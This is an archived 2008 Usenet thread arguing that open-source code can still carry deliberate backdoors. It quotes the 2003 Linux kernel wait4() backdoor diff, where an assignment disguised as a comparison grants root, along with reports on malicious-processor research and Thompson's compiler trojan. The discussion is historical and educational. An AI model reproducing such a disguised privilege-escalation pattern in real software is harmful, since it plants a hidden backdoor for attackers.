Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

The Security Advantages and Limitations of Open Source Software -- Guy Macon

8 views
Skip to first unread message

Guy Macon

unread,
May 29, 2008, 3:09:55 PM5/29/08
to


Post # 1 of 5 -Guy Macon

The following series of posts may give the impression that I do
not believe that Open Source software is secure, but that would
be a false impression. I am a big supporter of Open Source,
and agree that in most cases it is far more secure than any
proprietary software. The reason that I am posting this series
is in response to recent claims by anonymous posters claiming
that Open Source security isn't just very good, but is instead
perfect or nearly perfect. Here are some quotes showing such
claims:

"With software the source code tells you everything about the
software, from the very basic building blocks up assuming it's
built with open source tools. You can analyze that source, and use
it to reproduce a finished product directly. Then you can
mathematically compare your product to an off the shelf version and
detect the most minute differences with near perfect precision."

"My compiler is open source also. Which was already stated quite clearly
several times now. It's validated using the same methods every other
piece of software and every other tool on this machine is validated,
and will not willingly insert any 'back doors' in programs compiled with
it. The same goes for all the thousands of supporting libraries and
such that I use. It has all been endlessly peer reviewed, obtained from
reputable sources, and validated with cryptographic signatures using
keys obtained through separate channels. It's for all intents and
purposes impossible for a willfully compromised piece of software to
exist on this machine."

In the following series of posts, I will attempt to show that Open
Source is no magic bullet, and that we still have to trust the
developers to not purposely insert backdoors into Open Source code.
The reader should keep in mind that closed and proprietary software
is far worse in this regard.







--
Guy Macon <http://www.guymacon.com/> Guy Macon <http://www.guymacon.com/>
Guy Macon <http://www.guymacon.com/> Guy Macon <http://www.guymacon.com/>
Guy Macon <http://www.guymacon.com/> Guy Macon <http://www.guymacon.com/>
Guy Macon <http://www.guymacon.com/> Guy Macon <http://www.guymacon.com/>

Guy Macon

unread,
May 29, 2008, 3:24:32 PM5/29/08
to


Post # 2 of 5 -Guy Macon

Consider the following series of posts to the Linux Kernel
mailing list. Then imagine what the result would have been
if, through bribes or threats, the backdoor discussed had
been inserted by a trusted member of the development team.

If you think this is not possible, you are expecting the
members of the development team to care so much about
security that they cannot be bribed and to care so much
about security that they will ignore a criminal who
threatens to kill them or their family, or a government
who threatens to grab them off the street lock them up
in a metal box in some foreign country without telling
anybody what happened to them.

http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0621.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0627.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0629.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0633.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0666.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0630.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0635.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0647.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0649.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0653.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0699.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0717.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0728.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0651.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0756.html

(Note that the last 2 posts are by Linus Torvalds.)


Here are some key quotes from the above messages. The interested
reader should read the originals to get the entire context.

------------------------------------


"Somebody has modified the CVS tree on kernel.bkbits.net directly. Dave looked
at the machine and it looked like someone may have been trying to break in and
do it.

We've fixed the file in question, the conversion is done back here at BitMover
and after we transfer the files we check them and make sure they are OK and
this file got flagged.

The CVS tree is fine, you might want to remove and update exit.c to make sure
you have the current version in your tree however."

...

"The file here is fine which leads me to believe that someone modified
the file either on kernel.bkbits.net or managed to get in through the
pserver."

...

"It's not a big deal, we catch stuff like this, but it's annoying to the
CVS users."

------------------------------------

"...

> Out of curiosity, what were the changed lines?

--- GOOD 2003-11-05 13:46:44.000000000 -0800
+++ BAD 2003-11-05 13:46:53.000000000 -0800
@@ -1111,6 +1111,8 @@
schedule();
goto repeat;
}
+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+ retval = -EINVAL;
retval = -ECHILD;
end_wait4:
current->state = TASK_RUNNING;

..."

------------------------------------

">> That looks odd
>
> Not if you hope to get root.

You got it. Short-circuiting will make the second half of the
conditional execute only when the first half is true. So if options
equals __WCLONE|__WALL exactly, then the user is changed to root."

------------------------------------

"it looks like an attempt to backdoor the kernel, does it not?"

------------------------------------

"It sure does. Note "current->uid = 0", not "current->uid == 0".
Good eyes, I missed that. This function is sys_wait4() so by passing in
__WCLONE|__WALL you are root. How nice."

------------------------------------

"Also note the extra parentheses to avoid a gcc warning."

------------------------------------

"First of all, thanks Larry for detecting this. Your paranoia that made
you add extra checks on the export of data (also evident in the BK
checksums everywhere) probably saved Linux as a whole a lot of grief.

Had something like this been submarined into the kernel without any
review it might have taken a good while to find,"

------------------------------------

"It's worth mentioning that it would be close to impossible to add the
same to change to BK unnoticed. It's possible but the accountability
would be a lot better and the bad user could be tarred and feathered."

...

"I've verified 30 seconds ago that the change is not in in Linus'
BK tree. We run these comparisons every night (and I'm going to
increase that after we reinstall the machine). So I noticed this
this morning and had the tree fixed this afternoon; I suppose
people could complain that it should have been sooner but I was
running tests to make sure it was not some problem in the BK2CVS
exporter code.

Even with the delay, the problem was identified and corrected in less
than 24 hours. That doesn't leave a lot of time to have the problem
get into the real release tree."

------------------------------------

"Somebody getting access to and inserting exploits directly into
the Linux source is not something we should take lightly."

------------------------------------

"It is well known that anybody who has the capabilities of
inserting a module into the most secure kernel in the
universe [Linux], could have designed the module to give
the current caller root privs when some module function
is executed.

$ whoami
cracker
$ od /dev/TROJAN
$ whoami
root
$

The kernel sources can be inspected using automation, looking
for accesses to 'current'. The expected patterns can be ignored.
Accesses to current->XXX,current->YYY,current->YYY, etc., could be
reviewed. However, this doesn't stop the clever programmer who
creates a pointer that, using a difficult-to-follow path, has
access to these structure members.

So, basically, any open-source kernel is vulnerable. Also any
closed-source kernel is also vulnerable. We already know that
M$ had hundreds of bugs, perhaps more, that allowed a hacker
complete unrestricted access to a machine on the network. We
also know that there are deliberate back-doors inserted to
allow governments to inspect the contents of these computers
(search on magic lantern and carnivor)."

------------------------------------

From: Linus Torvalds

"A few things do make the current system _fairly_ secure. One of them is
that if somebody were to actually access the BK trees directly, that would
be noticed immediately: when I push to the places I export from, the push
itself would fail due to having an unexpected changeset in the target that
I don't have on my local tree. So I'd notice that kind of stuff
immediately.

And that's likely to be true of all other BK users too: the public trees
are just replicas of the trees people actually _work_ on, so if the public
tree has something unexpected, trying to update them just won't work. You
just can't push to a tree that isn't a subset of what you already have.

So any BK corruption would have to come from the private trees, not the
public ones. Which tend to be better secured, exactly because they are
private (ie they don't have things like cvspserver etc public servers). I
suspect most of us have firewalls that just don't accept any incoming
connections - I know I do.

I think it's telling that it was the CVS tree and not the BK tree that
somebody tried to corrupt.

Linus"



> And, was there any route via which this malicious patch could've worked
> itself into a kernel release?

No. There are two ways to get into a kernel release: patches to me by
email (which depending on the person get more or less detailed scrutiny,
but core files would definitely get a read-through and need an
explanation), and through BK merges.

And the people who merge with BK wouldn't have used the CVS tree.

Linus



------------------------------------

(End of quoted Material; Guy Macon writing again)

The bottom line is that it is possible for someone who everyone
trusts to write code that is then inserted into some Open Source
software puts in a backdoor, no automated method will catch it.
The only way it would be detected is by someone else examining
the code and catching the backdoor. As can be seen in the
example above, the backdoor can be very subtle and hard to notice.

Guy Macon

unread,
May 29, 2008, 3:31:31 PM5/29/08
to


Post # 3 of 5 -Guy Macon

------------------------------------

"Thwarted Linux backdoor hints at smarter hacks

"Software developers on Wednesday detected and thwarted a hacker's
scheme to submerge a slick backdoor in the next version of the Linux
kernel, but security experts say the abortive caper proves that
extremely subtle source code tampering is more than just the stuff of
paranoid speculation.

"The backdoor was a two-line addition to a development copy of the
Linux kernel's source code, carefully crafted to look like a harmless
error-checking feature added to the wait4() system call -- a function
that's available to any program running on the computer, and which,
roughly, tells the operating system to pause execution of that program
until another program has finished its work.

"Under casual inspection, the code appears to check if a program
calling wait4() is using a particular invalid combination of two
flags, and if the user invoking it is the computer's all-powerful root
account. If both conditions are true, it aborts the call.

"But up close, the code doesn't actually check if the user is root at
all. If it sees the flags, it grants the process root privileges,
turning wait4() into an instant doorway to complete control of any
machine, if the hacker knows the right combinations of flags.

"That difference between what the code looks like and what it actually
is -- that is, between assignment and comparison -- is a matter of a
single equal sign in the C programming language, making it easy to
overlook. If the addition had been detected in a normal code review,
the backdoor could even have been mistaken for a programming error --
no different from the buffer overflows that wind up in Microsoft
products on a routine basis. 'It's indistinguishable from an
accidental bug,' says security consultant Ryan Russell. 'So unless you
have a reason to be suspicious, and go back and find out if it was
legitimately checked in, that's going to be a long trail to follow.'

"Investigation Underway

"In all, the unknown hacker used exactly the sort of misdirection and
semantic trickery that security professionals talk about over beer
after a conference, while opining on how clumsy the few discovered
source code backdoors have been, and how a real cyber warrior would
write one.

"'That's the kind of pub talk that you end up having,' says BindView
security researcher Mark 'Simple Nomad' Loveless. 'If you were the
NSA, how would you backdoor someones software? You'd put in the
changes subtly. Very subtly.'

"'Whoever did this knew what they were doing,' says Larry McVoy,
founder of San Francisco-based BitMover, Inc., which hosts the Linux
kernel development site that was compromised. 'They had to find some
flags that could be passed to the system without causing an error, and
yet are not normally passed together... There isn't any way that
somebody could casually come in, not know about UNIX, not know the
Linux kernel code, and make this change. Not a chance.'

"However sophisticated, the hack fell apart Wednesday, when a routine
file integrity check told McVoy that someone had manually changed a
copy of a kernel source code file that's normally only modified by an
automated process, specifically one that pulls the code from
BitMover's BitKeeper software collaboration tool and repackages it for
the open source CVS system still favored by some developers.

"Even then, McVoy didn't initially recognize the change as a backdoor,
and he announced to the Linux kernel developers list as a procedural
annoyance. Other programmers soon figured out the trick, and by
Thursday an investigation into how the development site was
compromised was underway, headed by Linux chief Linus Torvalds,
according to McVoy.

"If BitMover didn't run automated integrity checks, the backdoor could
have made it into the official release of version 2.6 of the kernel,
and eventually into every up-to-date Linux machine on the Internet.
But to get there a kernel developer using CVS would have to have used
the modified file as the basis for further development, then submitted
it to the main BitKeeper repository through Torvalds.

"'If it had gotten out, it could have been really bad, because any
Linux kernel that had this in it, anybody who had access to that
machine could become root,' says McVoy. But even then, he's convinced
it wouldn't have lasted long. 'If someone started getting root with
it, some smart kid would figure out what was going on.'

"But Loveless says the hack is a glimpse of a more sophisticated
computer underground than is normally talked about, and fuel for
speculation that backdoors in software products are far more common
than imagined. 'We've had bad examples of [backdoors], and we've had
rumors of extremely good examples,' says Loveless. 'This is a concrete
example of a good one.'"

Source: http://www.securityfocus.com/news/7388

------------------------------------

Guy Macon

unread,
May 29, 2008, 3:42:42 PM5/29/08
to


Post # 4 of 5 -Guy Macon

------------------------------------

"For years, hackers have focused on finding bugs in computer software
that give them unauthorized access to computer systems, but now
there's another way to break in: Hack the microprocessor.

"Researchers at the University of Illinois at Urbana-Champaign
demonstrated how they altered a computer chip to grant attackers
backdoor access to a computer. It would take a lot of work to make
this attack succeed in the real world, but it would be virtually
undetectable.

"To launch its attack, the team used a special programmable processor
running the Linux operating system. The chip was programmed to inject
malicious firmware into the chip's memory, which then allows an
attacker to log into the machine as if he were a legitimate user. To
reprogram the chip, researchers needed to alter only a tiny fraction
of the processor circuits. They changed 1,341 logic gates on a chip
that has more than 1 million of these gates in total, said Samuel
King, an assistant professor in the university's computer science
department.

"'This is like the ultimate back door,' said King. 'There were no
software bugs exploited.'

"King demonstrated the attack on Tuesday at the Usenix Workshop on
Large-Scale Exploits and Emergent Threats, a conference for security
researchers held in San Francisco.

"His team was able to add the back door by reprogramming a small
number of the circuits on a LEON processor running the Linux operating
system. These programmable chips are based on the same Sparc design
that is used in Sun Microsystems' midrange and high-end servers. They
are not widely used, but have been deployed in systems used by the
International Space Station.

"In order to hack into the system, King first sent it a specially
crafted network packet that instructed the processor to launch the
malicious firmware. Then, using a special login password, King was
able to gain access to the Linux system. 'From the software's
perspective, the packet gets dropped ... and yet I have full and
complete access to this underlying system that I just compromised,'
King said.

Source: http://www.cs.uiuc.edu/news/articles.php?id=2008May14-341

------------------------------------

"A team led by Samuel King, assistant professor at the University of
Illinois, Urbana-Champaign, has demonstrated how to gain control of a
computer by adding malicious circuits to its processor.

"Such circuits are effectively invisible to antivirus and other
security software because they interfere with the computer at a deeper
level than a software-based virus or even a rootkit.

"King's team explained to New Scientist that they used a processor
called a field programmable gate array (FPGA), in which logic circuits
can be rearranged to create a replica of an existing open source
processor called Leon3.

"The original processor contains around 1.7 million circuits, but the
boffins added about 1,000 malicious circuits not present in Leon3.

"The new circuits allowed them to bypass security controls on Leon3 in
a similar way to which a virus hands control of a computer to a
hacker, but without requiring a flaw in a software application.

"When the scientists connected the FPGA to another computer, they were
able to steal passwords and install malicious software that allowed
the operating system to be controlled remotely.

"'Once you have this mechanism in place, you can do whatever you
want,' King told New Scientist."

Source: http://www.itnews.com.au/News/NewsStory.aspx?story=75106

------------------------------------

"Consider a recent paper by U. Illinois's Sam King et al. where they
built a 'malicious processor'. The idea is pretty clever. You send
along a 'secret knock' (e.g., a network packet with a particular
header) which triggers a sensor that enables 'shadow code' to start
running alongside the real operating system. The Illinois team built
shadow code that compromised the Linux login program, adding a
backdoor password. After the backdoor was tripped, it would disable
the shadow code, thus going back to 'normal' operation.

"The military is awfully worried about this sort of threat, as well
they should be. For that matter, so are voting machine critics. It's
awfully easy for 'stealth' malicious behavior to exist in legitimate
systems, regardless of how carefully you might analyze or test it."

Source: http://www.freedom-to-tinker.com/?p=1289

Guy Macon

unread,
May 29, 2008, 3:54:44 PM5/29/08
to


Post # 5 of 5 -Guy Macon

------------------------------------

"There is no strong guarantee that source code and binaries of an
application have any real relationship."

"All the benefits of source code peer review are irrelevant if you
can not be certain that a given binary application is the result
of the reviewed source code.

"Ken Thompson made this very clear during his 1983 Turing Award
lecture to the ACM, in which he revealed a shocking, and subtle,
software subversion technique that's still illustrative seventeen
years later.

"Thompson modified the UNIX C compiler to recognize when the login
program was being compiled, and to insert a back door in the
resulting binary code such that it would allow him to login as
any user using a 'magic' password.

"Anyone reviewing the compiler source code could have found the
back door, except that Thompson then modified the compiler so
that whenever it compiled itself, it would insert both the code
that inserts the login back door, as well as code that modifies
the compiler. With this new binary he removed the modifications
he had made and recompiled again.

"He now had a trojaned compiler and clean source code. Anyone
using his compiler to compile either the login program , or
the compiler, would propagate his back doors.

"The reason his attack worked is because the compiler has a
bootstrapping problem. You need a compiler to compile the
compiler. You must obtain a binary copy of the compiler before
you can use it to translate the compiler source code into a
binary. There was no guarantee that the binary compiler you
were using was really related to the source code of the same."

Source: http://www.securityfocus.com/news/19

------------------------------------

"Perhaps the definitive account of the problems inherent in computer
security and trust is related in Ken Thompson's article, _Reflections
on Trusting Trust_ [Communications of the ACM, Volume 27, Number 8,
August 1984]. Thompson describes a back door planted in an early
research version of UNIX.

"The back door was a modification to the /bin/login program that would
allow him to gain superuser access to the system at any time, even if
his account had been deleted, by providing a predetermined username
and password. While such a modification is easy to make, it's also an
easy one to detect by looking at the computer's source code. So
Thompson modified the computer's C compiler to detect if it was
compiling the login.c program. If so, then the additional code for the
back door would automatically be inserted into the object-code stream,
even though the code was not present in the original C source file.

"Thompson could now have the login.c program inspected by his
coworkers, compile the program, install the /bin/login executable, and
yet be assured that the back door was firmly in place.

"But what if somebody inspected the source code for the C compiler
itself? Thompson thought of that case as well. He further modified the
C compiler so that it would detect whether it was compiling the source
code for itself. If so, the compiler would automatically insert the
special program recognition code. After one more round of compilation,
Thompson was able to put all the original source code back in place.

"Thompson's experiment was like a magic trick. There was no back door
in the login.c source file and no back door in the source code for the
C compiler, and yet there was a back door in both the final compiler
and in the login program. Abracadabra!

"What hidden actions do your compiler and login programs perform?"

Source: _Practical UNIX and Internet Security_,
http://www.hackemate.com.ar/textos/O'reilly%20-%20Complete%20Bookshelf/networking_bookshelf/puis/ch27_01.htm

------------------------------------

"Ken Thompson's Reflections on Trusting Trust
[http://portal.acm.org/citation.cfm?id=358198.358210] was the first
major paper to describe black box backdoor issues, and points out
that trust is relative. It described a very clever backdoor mechanism
based upon the fact that people only review source (human-written)
code, and not compiled machine code. A program called a compiler is
used to create the second from the first, and the compiler is usually
trusted to do an honest job.

"Thompson's paper described a modified version of the Unix C compiler
that would:

* Put an invisible backdoor in the Unix login command when compiled,
and as a twist

* Also add this feature undetectably to future compiler versions
upon their compilation as well.

"Because the compiler itself was a compiled program, users would be
extremely unlikely to notice the machine code instructions that
performed these tasks. (Because of the second task, the compiler's
source code would appear 'clean'.) What's worse, in Thompson's proof
of concept implementation, the subverted compiler also subverted the
analysis program (the disassembler), so that anyone who examined the
binaries in the usual way would not actually see the real code that
was running, but something else instead.

...

"In theory, once a system has been compromised with a backdoor or
Trojan horse, such as the Trusting Trust compiler, there is no way for
the 'rightful' user to regain control of the system. However, several
practical weaknesses in the Trusting Trust scheme have been suggested.
(For example, a sufficiently motivated user could painstakingly review
the machine code of the untrusted compiler before using it. As
mentioned above, there are ways to counter this attack, such as
subverting the disassembler; but there are ways to counter that
defense, too, such as writing your own disassembler from scratch, so
the infected compiler won't recognize it.)"

Source: http://en.wikipedia.org/wiki/Backdoor_(computing)

------------------------------------

Also see:
http://portal.acm.org/citation.cfm?id=358198.358210
http://portal.acm.org/citation.cfm?id=777313.777347

Ari

unread,
May 30, 2008, 7:11:09 PM5/30/08
to
On Thu, 29 May 2008 13:09:55 CST, Guy Macon wrote:

> In the following series of posts, I will attempt to show that Open
> Source is no magic bullet, and that we still have to trust the
> developers to not purposely insert backdoors into Open Source code.

Good luck, Guy, you're fighting " O Brave Sir Anonymouse"


--
An Explanation Of The Need To Be "Anonymous"
http://www.penny-arcade.com/comic/2004/03/19

Paul E. Bennett

unread,
May 31, 2008, 10:11:42 AM5/31/08
to
Guy Macon wrote:

>
>
>
> Post # 1 of 5 -Guy Macon
>
> The following series of posts may give the impression that I do
> not believe that Open Source software is secure, but that would
> be a false impression. I am a big supporter of Open Source,
> and agree that in most cases it is far more secure than any
> proprietary software. The reason that I am posting this series
> is in response to recent claims by anonymous posters claiming
> that Open Source security isn't just very good, but is instead
> perfect or nearly perfect. Here are some quotes showing such
> claims:

Like almost everything else in this life, if you want perfect for you
then you have to buckle down and do it yourself. If you use stuff that
is the work of others then either you have to feel you can trust them or
you have to prove that what they produce really is trustworthy. Some
things really deserve much more attention to detail than they receive
and preservation of safety and security is two of them.

--
********************************************************************
Paul E. Bennett...............<email://Paul_E....@topmail.co.uk>
Forth based HIDECS Consultancy
Mob: +44 (0)7811-639972
Tel: +44 (0)1235-811095
Going Forth Safely ..... EBA. www.electric-boat-association.org.uk..
********************************************************************

0 new messages